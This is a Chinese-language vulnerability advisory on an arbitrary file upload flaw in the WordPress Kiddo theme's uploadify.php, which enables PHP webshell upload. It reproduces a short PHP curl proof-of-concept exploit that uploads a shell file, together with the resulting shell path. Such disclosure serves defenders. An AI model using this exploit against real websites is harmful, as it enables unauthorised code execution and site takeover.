发布日期:2014-02-11
更新日期:2014-02-13受影响系统:
WordPress Kiddo 1.x
描述:
--------------------------------------------------------------------------------
WordPress Kiddo是WordPress的儿童主题。WordPress Kiddo的/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php脚本允许上传任意扩展名的文件到webroot的文件夹内,如果上传的文件包含恶意PHP脚本,即可导致执行任意PHP代码。<*来源:TUNISIAN CYBER
链接:http://secunia.com/advisories/56874/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!?php
*/
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Kidoo WP Theme File Upload Vulnerability
[+] Date: 05-02-2014
[+] Category: WebApp
[+] Google Dork: :(
[+] Tested on: KaliLinux
[+] Vendor: n/a
[+] Friendly Sites: na3il.com,th3-creative.comKiddo WP theme suffers from a File Upload Vulnerability+PoC:
site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php+Shell Path:
site/3vil.phpScreenShot:
http://i.imgur.com/c62cWHH.pngGreets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
E4A Members:
Gastro-DZ*/echo "===============================================
";
echo " Kiddo WP Theme File Upload Vulnerability
";
echo " TUNISIAN CYBER
";
echo "===============================================
";
$uploadfile="cyber.php";
$ch = curl_init("site-content/themes/kiddo/app/assets/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array("Filedata"=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>建议:
--------------------------------------------------------------------------------
厂商补丁:WordPress
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://themeforest.net/item/kiddo-a-powerful-kids-theme/802808Pidgin "process_chunked_data()"函数缓冲区溢出漏洞Fortinet FortiOS "mkey"参数跨站脚本执行漏洞相关资讯 WordPress漏洞
- Wordpress 跨站请求伪造漏洞(CVE- (今 16:15)
- WordPress wp_get_attachment_link (06月30日)
- WordPress customizer重定向限制绕 (06月30日)
| - Wordpress Admin API拒绝服务漏洞( (今 16:14)
- WordPress column_title跨站脚本漏 (06月30日)
- WordPress 访问限制绕过漏洞(CVE- (06月30日)
|
本文评论 查看全部评论 (0)